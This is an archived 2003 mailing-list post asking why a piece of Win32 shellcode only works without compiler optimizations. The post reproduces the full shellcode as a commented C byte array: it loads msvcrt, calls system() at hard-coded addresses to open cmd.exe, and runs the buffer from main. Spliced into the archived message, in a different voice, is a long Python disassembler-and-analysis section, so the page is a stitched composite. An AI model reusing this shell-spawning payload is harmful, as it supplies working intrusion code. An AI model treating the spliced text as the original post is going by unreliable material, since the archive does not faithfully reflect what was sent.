shellcode not executing if optimizations are on.

From: wirepair (wirepairat_private)
Date: Wed Apr 30 2003 - 08:46:20 PDT


    Ok so I'm still trying my hand at writing shellcode for 
    win32.
    My problem is my code executes fine as long as I compile 
    without optimizations. If I disable optimizations it 
    executes fine and I get my cmd.exe shell. Could anyone 
    throw me a fricken bone and tell me what I'm doing wrong? 
    You can find my inline asm (which this is based off 
    of) at: http://sh0dan.org/files/llacmd.txt.
    But if you're lazy like I am you'll probably just want to 
    see this:
    
    #include <stdio.h>
    
    int main(int argc, char **argv) {
    	char shellcizode[] = 
    	"\x55"				// push ebp
    	"\x8b\xec"			// mov ebp, esp
    	"\x53"				// push ebx
    	"\x56"				// push esi
    	"\x57"				// push edi
    	"\x8b\xe5"			// mov esp, ebp
    	"\x55"				// push ebp
    	"\x8b\xec"			// mov ebp, esp
    	"\x33\xff"			// xor edi,edi
    	"\x57"				// push edi
    	"\x57"				// push edi
    	"\xc6\x45\xf8\x6d"		// mov byte ptr ss:[ebp-8],6d
    	"\xc6\x45\xf9\x73"		// mov byte ptr ss:[ebp-7],73
    	"\xc6\x45\xfa\x76"		// mov byte ptr ss:[ebp-6],76
    	"\xc6\x45\xfb\x63"		// mov byte ptr ss:[ebp-5],63
    	"\xc6\x45\xfc\x72"		// mov byte ptr ss:[ebp-4],72
    	"\xc6\x45\xfd\x74"		// mov byte ptr ss:[ebp-3],74
    	"\xb8\xe8\xfe\xe9\x77"		// mov eax,kernel32.loadlibraryA
    	"\x50"				// push eax
    	"\x8d\x45\xf8"			// lea eax, dword ptr ss:[ebp-8]
    	"\x50"				// push eax
    	"\xff\x55\xf4"			// call dword ptr ss:[ebp-c]
    	"\x58"				// pop eax
    	"\x58"				// pop eax
    	"\x58"				// pop eax
    	"\x33\xc0"			// xor eax,eax
    	"\x50"				// push eax
    	"\x50"				// push eax
    	"\xc6\x45\xf8\x63"		// mov byte ptr ss:[ebp-8],63
    	"\xc6\x45\xf9\x6d"		// mov byte ptr ss:[ebp-7],6d
    	"\xc6\x45\xfa\x64"		// mov byte ptr ss:[ebp-6],64
    	"\xc6\x45\xfb\x2e"		// mov byte ptr ss:[ebp-5],2e
    	"\xc6\x45\xfc\x65"		// mov byte ptr ss:[ebp-4],65
    	"\xc6\x45\xfd\x78"		// mov byte ptr ss:[ebp-3],78
    	"\xc6\x45\xfe\x65"		// mov byte ptr ss:[ebp-2],65
    	"\xb8\xc3\xaf\x01\x78"		// mov eax, 7801AFC3; addy of system() from msvcrt
    	"\x50"				// push eax
    	"\x8d\x45\xf8"			// lea eax, dword ptr ss:[ebp-8]
    	"\x50"				// push eax
    	"\xff\x55\xf4"			// call dword ptr ss:[ebp-c]
    	"\x83\xc4\x04"			// add esp, 04h
    	"\x5c"				// pop esp
    	"\xc3";				// ret			we're done!
    	((void (*)(void))&shellcizode)();
    
    	return(0);
    }
    I'm sure the formatting got totally screwed but basically 
    I'm calling LoadLibraryA with msvcrt to be able to use 
    the address of system() to execute cmd.exe. Now this only 
    works IF optimizations are disabled. Any hints??
    Thanks,
    -wire
    _____________________________
    For the best comics, toys, movies, and more,
    please visit <http://www.tfaw.com/?qt=wmf>
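An added static-analysis example, not code from the post or from the sh0dan.org file it references: a Python decoder for exactly the x86-32 instruction forms this shellcode uses. The byte string is transcribed from the post's C literal; the instruction subset, the `Insn` tuple and the names `decode`, `analyze` and `listing` are this example's own. It pulls out the two hard-coded absolute addresses (which are only valid for the particular kernel32 and msvcrt builds they were read from), reconstructs the strings the code assembles on the stack one byte at a time, and lists every instruction that rewrites esp or addresses memory relative to ebp, which is the first thing an analyst inspects when code like this behaves differently depending on how the harness around it was compiled.

```python
"""Decoder for the small x86-32 subset used by the shellcode in the post (added example)."""
import struct
from collections import namedtuple

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Constructed input: the bytes of the post's C string literal, transcribed in order.
SHELLCODE = bytes.fromhex(
    "55 8bec 53 56 57 8be5 55 8bec 33ff 57 57"
    " c645f86d c645f973 c645fa76 c645fb63 c645fc72 c645fd74"
    " b8e8fee977 50 8d45f8 50 ff55f4 58 58 58"
    " 33c0 50 50"
    " c645f863 c645f96d c645fa64 c645fb2e c645fc65 c645fd78 c645fe65"
    " b8c3af0178 50 8d45f8 50 ff55f4 83c404 5c c3"
)

# offset: byte offset; text: assembler-style rendering; info: extracted facts about the instruction
Insn = namedtuple("Insn", "offset text info")


def _s8(b):
    """Sign-extend an 8-bit displacement."""
    return b - 0x100 if b & 0x80 else b


def decode(code):
    """Linear-sweep decoder for just the opcodes this shellcode uses; raises on anything else."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if 0x50 <= op <= 0x57:                                   # push r32
            out.append(Insn(i, "push " + REGS[op - 0x50], {})); i += 1
        elif 0x58 <= op <= 0x5f:                                 # pop r32 (pop esp rewrites the stack pointer)
            reg = REGS[op - 0x58]
            out.append(Insn(i, "pop " + reg, {"esp_write": reg == "esp"})); i += 1
        elif op == 0xc3:
            out.append(Insn(i, "ret", {})); i += 1
        elif op in (0x8b, 0x33) and code[i + 1] >= 0xc0:         # mov/xor r32, r32 (mod == 11)
            modrm = code[i + 1]
            dst, src = REGS[(modrm >> 3) & 7], REGS[modrm & 7]
            mnem = "mov" if op == 0x8b else "xor"
            out.append(Insn(i, f"{mnem} {dst}, {src}", {"esp_write": dst == "esp"})); i += 2
        elif op == 0xb8:                                         # mov eax, imm32 (hard-coded address)
            imm = struct.unpack_from("<I", code, i + 1)[0]
            out.append(Insn(i, f"mov eax, 0x{imm:08x}", {"imm32": imm})); i += 5
        elif op == 0xc6 and code[i + 1] == 0x45:                 # mov byte [ebp+disp8], imm8
            disp, imm = _s8(code[i + 2]), code[i + 3]
            out.append(Insn(i, f"mov byte [ebp{disp:+#x}], 0x{imm:02x}",
                            {"store8": (disp, imm), "frame": True})); i += 4
        elif op == 0x8d and code[i + 1] == 0x45:                 # lea eax, [ebp+disp8]
            disp = _s8(code[i + 2])
            out.append(Insn(i, f"lea eax, [ebp{disp:+#x}]", {"frame": True})); i += 3
        elif op == 0xff and code[i + 1] == 0x55:                 # call dword [ebp+disp8]
            disp = _s8(code[i + 2])
            out.append(Insn(i, f"call dword [ebp{disp:+#x}]", {"call": disp, "frame": True})); i += 3
        elif op == 0x83 and code[i + 1] == 0xc4:                 # add esp, imm8
            out.append(Insn(i, f"add esp, {code[i + 2]}", {"esp_write": True})); i += 3
        else:
            raise ValueError(f"unhandled opcode 0x{op:02x} at offset {i}")
    return out


def analyze(code):
    """Summarise what the code depends on: absolute addresses, stack-built strings, frame use."""
    addresses, strings, frame_ops, esp_writes, pending = [], [], [], [], {}
    for ins in decode(code):
        if "store8" in ins.info:
            disp, imm = ins.info["store8"]
            pending[disp] = imm
        if "imm32" in ins.info:
            addresses.append(ins.info["imm32"])
        if "call" in ins.info and pending:
            # The byte stores before each call build a string below ebp; the NUL terminator
            # comes from the zeroed slots pushed just before the stores, so only the
            # explicitly written bytes are collected here.
            strings.append(bytes(pending[d] for d in sorted(pending)).decode("ascii"))
            pending.clear()
        if ins.info.get("frame"):
            frame_ops.append(ins.text)
        if ins.info.get("esp_write"):
            esp_writes.append(ins.text)
    return {"addresses": addresses, "strings": strings,
            "frame_relative": frame_ops, "esp_writes": esp_writes}


def listing(code):
    """Plain-text disassembly listing, one instruction per line."""
    return "\n".join(f"{ins.offset:04x}: {ins.text}" for ins in decode(code))


if __name__ == "__main__":
    print(listing(SHELLCODE))
    summary = analyze(SHELLCODE)
    print("absolute addresses:", [hex(a) for a in summary["addresses"]])
    print("stack-built strings:", summary["strings"])
    print("instructions that rewrite esp:", summary["esp_writes"])
```

Running it lists the 43 instructions, the two addresses 0x77e9fee8 and 0x7801afc3, the strings "msvcrt" and "cmd.exe", and the three instructions that set esp (`mov esp, ebp`, `add esp, 4`, `pop esp`). The decoder is deliberately limited to the encodings present, so any other byte pattern raises rather than being silently misread.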
    



    This archive was generated by hypermail 2b30 : Wed Apr 30 2003 - 09:09:33 PDT